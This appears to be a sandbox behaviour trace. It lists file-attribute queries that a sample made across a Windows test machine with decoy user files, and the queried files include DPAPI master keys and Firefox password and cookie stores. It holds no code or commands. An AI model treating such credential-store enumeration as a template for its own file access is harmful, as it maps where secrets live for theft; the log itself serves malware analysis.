Get Info	C:\System Volume Information\SPP\SppGroupCache\{00C95144-E912-40B3-A2D1-B8E12BC815D0}_DriverPackageInfo	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\SppGroupCache\{00C95144-E912-40B3-A2D1-B8E12BC815D0}_WindowsUpdateInfo	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\SppGroupCache\{1CE95DD8-C40B-44FD-A9E6-D72D44ED8F39}_DriverPackageInfo	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\SppGroupCache\{1CE95DD8-C40B-44FD-A9E6-D72D44ED8F39}_WindowsUpdateInfo	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\SppGroupCache\{1E9425CC-553B-418F-B0C6-AD1AC9E1BA0C}_DriverPackageInfo	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\SppGroupCache\{1E9425CC-553B-418F-B0C6-AD1AC9E1BA0C}_WindowsUpdateInfo	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\SppGroupCache\{29088C66-DE5F-456F-85C0-6E4156F94358}_DriverPackageInfo	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\SppGroupCache\{29088C66-DE5F-456F-85C0-6E4156F94358}_WindowsUpdateInfo	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\SppGroupCache\{29296136-1F54-4FD8-B5C7-32FC96EF3C76}_DriverPackageInfo	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\SppGroupCache\{29296136-1F54-4FD8-B5C7-32FC96EF3C76}_WindowsUpdateInfo	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\SppGroupCache\{4204EE1B-0338-4788-B199-D83E4955FAF1}_DriverPackageInfo	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\SppGroupCache\{4204EE1B-0338-4788-B199-D83E4955FAF1}_WindowsUpdateInfo	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\SppGroupCache\{425865B3-1A09-4BE3-8A97-1BAFFDA74ED0}_DriverPackageInfo	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\SppGroupCache\{425865B3-1A09-4BE3-8A97-1BAFFDA74ED0}_WindowsUpdateInfo	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\SppGroupCache\{51296D62-5AA5-412E-9A8F-ABE77CD15E9E}_DriverPackageInfo	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\SppGroupCache\{51296D62-5AA5-412E-9A8F-ABE77CD15E9E}_WindowsUpdateInfo	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\SppGroupCache\{5AC56584-2304-47B9-B262-8D3164A52D9E}_DriverPackageInfo	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\SppGroupCache\{5AC56584-2304-47B9-B262-8D3164A52D9E}_WindowsUpdateInfo	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\SppGroupCache\{77AC2C2C-D323-4D07-BBBC-9F6908DE6F91}_DriverPackageInfo	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\SppGroupCache\{77AC2C2C-D323-4D07-BBBC-9F6908DE6F91}_WindowsUpdateInfo	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\SppGroupCache\{7A521DBE-9658-44E5-843C-29DD5C50D136}_DriverPackageInfo	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\SppGroupCache\{7A521DBE-9658-44E5-843C-29DD5C50D136}_WindowsUpdateInfo	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\SppGroupCache\{8000FFCD-1DA9-461E-A8A6-B9C248869570}_DriverPackageInfo	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\SppGroupCache\{8000FFCD-1DA9-461E-A8A6-B9C248869570}_WindowsUpdateInfo	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\SppGroupCache\{8002C55B-B05C-402E-B80D-41CEAD61F984}_DriverPackageInfo	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\SppGroupCache\{8002C55B-B05C-402E-B80D-41CEAD61F984}_WindowsUpdateInfo	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\SppGroupCache\{9069688D-BEFB-4294-B8A6-15447E1F812D}_DriverPackageInfo	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\SppGroupCache\{9069688D-BEFB-4294-B8A6-15447E1F812D}_WindowsUpdateInfo	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\SppGroupCache\{A8F69A00-BBEC-42A5-A3EF-BF81814BD449}_DriverPackageInfo	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\SppGroupCache\{A8F69A00-BBEC-42A5-A3EF-BF81814BD449}_WindowsUpdateInfo	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\SppGroupCache\{B46F41EE-AB11-4C6A-890B-DF55C28A4B11}_DriverPackageInfo	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\SppGroupCache\{B46F41EE-AB11-4C6A-890B-DF55C28A4B11}_WindowsUpdateInfo	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\SppGroupCache\{BBEE4ABA-5DA4-47F0-BD54-17C95DFB7E64}_DriverPackageInfo	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\SppGroupCache\{BBEE4ABA-5DA4-47F0-BD54-17C95DFB7E64}_WindowsUpdateInfo	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\SppGroupCache\{C3F59859-DD84-4710-B6BE-740F016AD023}_DriverPackageInfo	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\SppGroupCache\{C3F59859-DD84-4710-B6BE-740F016AD023}_WindowsUpdateInfo	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\SppGroupCache\{C4C23D0F-5069-470F-9760-27EB797F66C2}_DriverPackageInfo	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\SppGroupCache\{C4C23D0F-5069-470F-9760-27EB797F66C2}_WindowsUpdateInfo	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\SppGroupCache\{C861246C-5D84-4FF4-A753-BAD4631D65CA}_DriverPackageInfo	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\SppGroupCache\{C861246C-5D84-4FF4-A753-BAD4631D65CA}_WindowsUpdateInfo	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\SppGroupCache\{CB7F5435-7D84-4F72-A889-A21E062F0CB6}_DriverPackageInfo	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\SppGroupCache\{CB7F5435-7D84-4F72-A889-A21E062F0CB6}_WindowsUpdateInfo	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\SppGroupCache\{DBAB67DA-647A-401E-A02B-58C06249C638}_DriverPackageInfo	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\SppGroupCache\{DBAB67DA-647A-401E-A02B-58C06249C638}_WindowsUpdateInfo	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\SppGroupCache\{EE224D27-954D-4040-87C6-066B5517487C}_DriverPackageInfo	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\SPP\SppGroupCache\{EE224D27-954D-4040-87C6-066B5517487C}_WindowsUpdateInfo	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\Syscache.hve	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\Syscache.hve.LOG1	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\tracking.log	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\{066f465a-4995-11e7-93e9-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\{12afb45a-681b-11e7-80b9-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\{12afb45e-681b-11e7-80b9-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\{3808876b-c176-4e48-b7ae-04046e6cc752}	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\{5a03eaea-6daf-11e7-b9a9-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\{5c1ec902-668e-11e7-870f-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\{7381dc5b-4993-11e7-87dc-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\{8456a7db-6db1-11e7-9a97-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\{9625b7da-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\{9625b905-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\{9625bc52-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\{9625bc56-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\{9625bc5a-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\{9625bc5e-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\{9625bc62-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\{9625bc66-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\{9625bc84-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\{9625bca0-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\{97a6ae5a-521a-11e7-94d2-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\{b426f660-7189-11e7-86ab-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\{b426f674-7189-11e7-86ab-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\{b8daad5a-66a7-11e7-8a16-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\{b8daad68-66a7-11e7-8a16-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}	type = file_attributes	1	Fn
Get Info	C:\System Volume Information\{b8daad8b-66a7-11e7-8a16-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\-DayvP7JqPOz.mp3	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\10sVmj P4.wav	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\31din7ow5vkoebLqCd.mp3	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\4DhKp-3wYPgXudWxJ9.jpg	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\4sWrkh0 cpz.ppt	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\5 rDjfI9.mp3	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Adobe\Acrobat\10.0\JavaScripts\glob.settings.js	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Adobe\Acrobat\10.0\Security\addressbook.acrodata	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\AR_DzvvYVqXbFC.png	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\cCayNEnL7P.avi	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\CI74df8bzh.gif	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\DnI50I2_-.odp	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\DoCM.pptx	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\DXrQjHb s_ge7HCAM.flv	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\eKFqn-s.mp3	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\hR9Jmg2bcuzAyr3E4P.mkv	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\MA1411.gif	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3388679973-3930757225-3770151564-1000\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3388679973-3930757225-3770151564-1000\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3388679973-3930757225-3770151564-1000\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Document Building Blocks\1033\14\Built-In Building Blocks.dotx	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\index.dat	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\MS Project\14\1033\Global.MPT	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Office\MSO1033.acl	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Office\Recent\Global.LNK	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Office\Recent\index.dat	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Office\Recent\Templates.LNK	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Outlook\Outlook.srs	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Outlook\Outlook.xml	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Protect\CREDHIST	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Protect\S-1-5-21-3111613574-2524581245-2586426736-500\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Protect\S-1-5-21-3111613574-2524581245-2586426736-500\Preferred	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Protect\S-1-5-21-3388679973-3930757225-3770151564-1000\02540a10-7eb7-4b20-a8c7-470f8986389c	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Protect\S-1-5-21-3388679973-3930757225-3770151564-1000\2be989a0-16a1-424b-9211-51aa3bb43e5d	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Protect\S-1-5-21-3388679973-3930757225-3770151564-1000\fbbe72db-afd8-443b-88dd-64b20388700d	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Protect\S-1-5-21-3388679973-3930757225-3770151564-1000\Preferred	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Protect\SYNCHIST	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Publisher Building Blocks\ContentStore.xml	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Templates\Normal.dotm	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20131025151332	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\addons.json	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\bookmarkbackups\bookmarks-2017-06-05_5.json	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\bookmarkbackups\bookmarks-2017-06-16_5.json	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\cert8.db	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\compatibility.ini	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\content-prefs.sqlite	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\cookies.sqlite	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\downloads.sqlite	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\extensions.ini	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\extensions.sqlite	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\key3.db	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\localstore.rdf	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\marionette.log	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\mimeTypes.rdf	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\permissions.sqlite	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\places.sqlite	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\pluginreg.dat	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\prefs.js	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\search.json	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\secmod.db	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\sessionstore.bak	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\sessionstore.js	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\signons.sqlite	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\times.json	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\webappsstore.sqlite	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\profiles.ini	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\n3rDqv5fFoX1Ry_t.mp4	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\n6UK91Wl.jpg	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\o5Sr.mp3	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\OCDQc.mp3	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\OQ76.png	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Q7m4 o69UFJZp0QFw.gif	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\RnyloUvEiOlgFswWxoi.bmp	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\SayBusYjAXv.png	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\tTlmm _BZQiif.mkv	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Tz4ATGFHqmeH_XF9.jpg	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\vI8uu4E.wav	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\WEGdsqHxrB6Rl_.mp3	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\wzIZj94sBmPj.pptx	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Aclviho ASldjfl.contact	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Administrator.contact	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\asdlfk poopvy.contact	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\chucu jadnvk.contact	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\lulcit amkdfe.contact	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\sikvnb huvuib.contact	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\2OGH.gif	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\3NFt.mkv	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\4ftsZpMw1g3gL.avi	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\76LU7Z52NxT.png	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\8kO0NJEBI0t_aH4wR4C.flv	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\94BuT.bmp	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\aZfX8HXaYp_3H -la-ai.gif	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\DV_MFjkGN0qANiJ.mp3	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\EtiFc2zH--B_1kTHu.pdf	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eTzwqz6GP.wav	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\fNHcSxfi.mp3	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\g4DSA4yI-juQrohXF.wav	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\ItpORrGbjc7K7PCQ.pdf	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\je9RaKcUCm.m4a	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\LHQUKhoeIhTRwLpT3UQi.swf	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\lVtKRcSlMRhnNAGMnovC.avi	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\MLiKMbL.rtf	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\nIujtiI.avi	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\SIk0c068 gsVkndwes.flv	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\sYFnn -89NTf68gdMaV.xls	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\uEeSzrUjPm-tdWsGKZ.mp3	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\V092xFSO9H2CfEGV6.bmp	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Whl7ioH1a1.jpg	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\yDTOs3XgmnBA7E33YPzb\0hntmH.png	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\yDTOs3XgmnBA7E33YPzb\C1tx.mp3	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\yDTOs3XgmnBA7E33YPzb\dp2 xk0V_8T-w0_PfnT\2a-LEH3kNNcEpoRFI7AR.jpg	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\yDTOs3XgmnBA7E33YPzb\dp2 xk0V_8T-w0_PfnT\51DcHy3JNxvL.gif	type = file_attributes	1	Fn
